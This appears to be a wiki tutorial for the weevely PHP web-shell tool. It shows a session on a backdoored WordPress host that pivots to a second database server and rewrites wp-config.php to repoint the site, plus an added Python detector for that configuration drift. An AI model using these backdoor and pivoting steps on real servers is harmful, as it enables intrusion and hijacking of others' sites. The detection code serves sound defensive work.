Edit db and code of a web app

Emilio edited this page Feb 4, 2018 · 3 revisions

This tutorial shows how to browse a database and edit PHP scripts by pivoting on a target whose strongly limited environment does not allow shell commands to be executed.

The goal is to reconfigure the WordPress installation on the target machine so that it uses a new database, wordpress2, hosted on the server target2.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: sql_console, pico (file_edit), gedit (file_edit)

Session

First of all, we check the accessibility and the credentials of the new database. Please note that the connection to target2 is made by pivoting on the target host, as if it were a standard ssh/telnet connection.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> :sql_console -user usr2 -passwd pwd2 -host target2
usr2@target2 SQL> show databases;
+--------------------+
| information_schema |
| wordpress2         |
| test               |
+--------------------+
usr2@target2 SQL> show tables in wordpress2;
+---------------------------+
| wp_commentmeta            |
| wp_comments               |
| wp_links                  |
| wp_options                |
| wp_postmeta               |
| wp_posts                  |
| wp_term_relationships     |
| wp_term_taxonomy          |
| wp_terms                  |
| wp_usermeta               |
| wp_users                  |
+---------------------------+
usr2@target2 SQL> ^DModule 'sql_console' execution terminated
www-data@target:/var/www PHP>

Now we're ready to replace the database information in the WordPress configuration file wp-config.php.

www-data@target:/var/www PHP> cd wordpress
www-data@target:/var/www/wordpress PHP> pico wp-config.php

Remote files can also be edited using a local graphical editor such as gedit:

www-data@target:/var/www/wordpress PHP> gedit wp-config.php

After saving the changes and closing the editor, the remote WordPress file wp-config.php contains the adjusted settings.
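Seen from the defending side, the edit made in this session shows up as drift in the DB_* constants of wp-config.php, even though disable_functions blocks shell execution. The following is an added example, not part of the original wiki page or of weevely: it parses those define() lines and compares them with a known-good baseline. The baseline values, the sample file content and the function names are constructed for illustration.

```python
import re

# Matches a line such as: define( 'DB_HOST', 'localhost' );
# Regex-based on purpose: it reads the file as text and never executes it.
DEFINE_RE = re.compile(
    r"""^\s*define\(\s*(['"])(DB_[A-Z_]+)\1\s*,\s*(['"])(.*?)\3\s*\)\s*;""",
    re.MULTILINE,
)
WATCHED = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")

# Constructed known-good values, recorded at deployment time (assumption).
BASELINE = {"DB_NAME": "wordpress", "DB_USER": "usr",
            "DB_PASSWORD": "pwd", "DB_HOST": "localhost"}

# Constructed wp-config.php content after the edit described in the tutorial.
SAMPLE_EDITED = """<?php
// define('DB_HOST', 'localhost');
define( 'DB_NAME', 'wordpress2' );
define( 'DB_USER', 'usr2' );
define( 'DB_PASSWORD', 'pwd2' );
define( "DB_HOST", "target2" );
$table_prefix = 'wp_';
"""


def parse_db_settings(config_text):
    """Return {constant: value} for the DB_* define() calls in the text."""
    settings = {}
    for match in DEFINE_RE.finditer(config_text):
        # PHP keeps the first define() of a constant, so do the same here.
        settings.setdefault(match.group(2), match.group(4))
    return settings


def find_drift(config_text, baseline=BASELINE):
    """Return (constant, expected, found) for every watched value that differs."""
    current = parse_db_settings(config_text)
    drift = []
    for name in WATCHED:
        expected, found = baseline.get(name), current.get(name)
        if expected != found:
            if name == "DB_PASSWORD":  # never echo secrets into alerts or logs
                expected = found = "<redacted>"
            drift.append((name, expected, found))
    return drift


if __name__ == "__main__":
    for name, expected, found in find_drift(SAMPLE_EDITED):
        print(f"ALERT {name}: expected {expected!r}, found {found!r}")
```

Run from a scheduler against the live file, a check like this flags a database host that has moved off the expected server; it complements, rather than replaces, file-integrity monitoring of the web root.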
